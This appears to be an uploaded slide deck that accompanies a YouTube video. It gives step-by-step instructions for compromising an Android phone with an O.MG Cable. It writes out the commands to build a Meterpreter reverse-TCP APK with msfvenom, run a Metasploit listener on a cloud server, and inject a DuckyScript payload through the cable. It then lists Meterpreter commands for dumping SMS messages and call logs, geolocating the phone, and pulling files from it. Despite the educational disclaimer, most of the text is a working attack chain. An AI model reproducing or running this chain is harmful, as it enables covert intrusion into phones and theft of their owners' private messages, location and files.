Uploaded by Sawi 2021

OMG Cable Android APK - Linode

advertisement
Generate APK to put on O.MG Cable
Disclaimer
This document DOES NOT promote or encourage any illegal activities!
The content in this document is provided solely for educational purposes and to create
awareness!
Watch YouTube Video
This document is a companion to my YouTube video:
• https://youtu.be/Qb8Wvo9u5zE
Requirements
1. A Directional O.MG Cable USB-C to USB-C Cable
O.MG USB-C TO USB-C
ACTIVE END WITH USB
WHICH DEPLOYS
PAYLOAD
Requirements
2. A Linode account.
3. An Android Phone.
1. Generate APK to download using O.MG Cable
•
Create your own virtual machine on Linode with a 60-day $100
credit: https://davidbombal.wiki/linode
•
If that link doesn't work for you, try this link:
https://www.linode.com/lp/youtubeviewers/?ifso=davidbombal
•
Please note: Credits expire in 60 days. Big thanks to Linode for
sponsoring my videos!
1. Generate APK to download using O.MG Cable
1. Login to Linode.
2. Click on Create Linode.
1. Generate APK to download using O.MG Cable
3. Choose distribution Ubuntu 21.10 and your Region of choice.
1. Generate APK to download using O.MG Cable
4. You can use a Shared CPU – Nanode 1 GB is good enough for this demo.
1. Generate APK to download using O.MG Cable
5. Set the Linode Label to something that makes sense to you, and choose a password.
1. Generate APK to download using O.MG Cable
6. Click on Create Linode.
1. Generate APK to download using O.MG Cable
7. SSH into your Linode machine. Using your credentials.
1. Generate APK to download using O.MG Cable
8. Enter yes when ask if you are sure you want to continue connecting.
1. Generate APK to put on O.MG Cable (Linode)
9. Enter your password for your Linode machine.
1. Generate APK to download using O.MG Cable
10. You are now ready to use your Ubuntu machine on Linode.
1. Generate APK to download using O.MG Cable
11. Enter the following command to download the Metasploit framework.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-frameworkwrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
Documentation with detailed instructions: https://docs.metasploit.com/docs/usingmetasploit/getting-started/nightly-installers.html
1. Generate APK to download using O.MG Cable
12. Metasploit Framework is now installed in the /opt/Metasploit-framework/bin/
directory
1. Generate APK to download using O.MG Cable
13. Run the following commands:
cd /opt/metasploit-framework/bin
sudo msfvenom -p android/meterpreter_reverse_tcp LHOST=<linode_ip> LPORT=4444 -o /data/omg.apk
1. Generate APK to download using O.MG Cable
14. Run the following commands:
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > run
1. Generate APK to download using O.MG Cable
14. Open a new terminal. SSH into the Linode Ubuntu machine, and run the following
command:
python3 -m http.server 8000
2. Load O.MG Cable Payload
O.MG Specific Steps
2. Load O.MG Cable Payload
1. Make sure your O.MG Cable is plugged into a device. Connect to the O.MG Cable WiFi.
2. Load O.MG Cable Payload
2. In your browser open http://192.168.4.1
2. Load O.MG Cable Payload
3. Get the payload for either Android 10 or Android 11 from the following page:
• Android 10 and 11: https://github.com/hak5/omgpayloads/tree/master/payloads/library/mobile/android/meterpreter
• Android 9 (Samsung Galaxy S8+ - with only Chrome browser):
https://github.com/davidbombal/hak5/blob/main/omg_android9SGS8_meterpreter
• Android 12 (Samsung Galaxy S22 Ultra – using Chrome browser as default):
https://github.com/davidbombal/hak5/blob/0cbefc353e61cee8d7519d2ab986fad96bcd
7aba/omg_androidS22Ultra.txt
2. Load O.MG Cable Payload
4. Copy the payload into the DuckyPayload area. You may need to edit the script to work
for different vendor specific versions of Android.
2. Load O.MG Cable Payload
5. Update the IP Address and port number to that of your Kali / Cloud server.
2. Load O.MG Cable Payload
6. Put the O.MG Cable payload side in the Android phone’s USB-C port.
7. On the browser with the DuckyScript Payload Area open click RUN.
3. Once Reverse Shell is Established -> Meterpreter
1. Once the reverse shell has been established you will see meterpreter > on your screen.
2. You can use the following commands on the Android device:
• pwd – Prints the current working directory on the phone.
• ifconfig – Shows all the network interfaces on the phone.
• ps – Shows the current processes that the Android operating system is running.
• sysinfo – Shows basic information about the Android device.
• send_sms -d “<phone_number>" -t “<text_content>"
3. Once Reverse Shell is Established -> Meterpreter
• geolocate – You can get the GPS coordinates for the Android phone.
• dump_sms – Extracts all sms messages and save it as a text file.
• dump_calllog – Get call log.
• upload – Allows you to upload a file to the Android device remotely.
• download – Allows you to download files from the Android device remotely.
• wlan_geolocate – Get current lat-long using WLAN information.
• getuid - Running getuid will display the user that the Meterpreter server is running
as on the host.
3. Once Reverse Shell is Established -> Meterpreter
Requires that the Android phone has a sim card from a service provider.
3. Once Reverse Shell is Established -> Meterpreter
Optional Extras (MSFVenom – Payload Explanation)
MSFVenom payload breakdown
Optional Extras (MSFVenom – Payload Explanation)
sudo msfvenom -p android/meterpreter_reverse_tcp LHOST=<ip_address> LPORT=4444 -o /data/omg.apk
• -p is for the payload which you’ll use. In this case android/meterpreter_reverse_tcp
• LHOST is for the localhost or server IP which will receive the back connection.
• LPORT is for the localhost or server port which the connection listen on for the victim.
• -o is for out, where you save the payload.
Sign APK – Additional Steps (Unnecessary)
•
Update Linux instance by running the following commands:
sudo apt update
sudo apt install openjdk-17-jdk
Sign APK – Additional Steps (Unnecessary)
•
Sign APK – Run the following commands:
sudo keytool -genkey –V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore omg.apk hacked
Sign APK – Additional Steps (Unnecessary)
•
Install Zipalign
sudo apt install zipalign
Sign APK – Additional Steps (Unnecessary)
•
Verify the .apk by using zipalign
sudo zipalign -v 4 omg.apk signed_omg.apk
Get more information
1. Website: https://www.youtube.com/davidbombal
2. Website: https://hak5.org/
3. Website: https://github.com/hak5/omgpayloads/tree/master/payloads/library/mobile/android/meterpreter
4. Website: https://www.offensive-security.com/metasploit-unleashed/meterpreterbasics/
We would like to acknowledge the following people:
• int0x80
• @_MG_
• Drewsec (https://www.youtube.com/channel/UCBWVaokY_7yCpVn-X0Ny9aA/)
Related documents
Download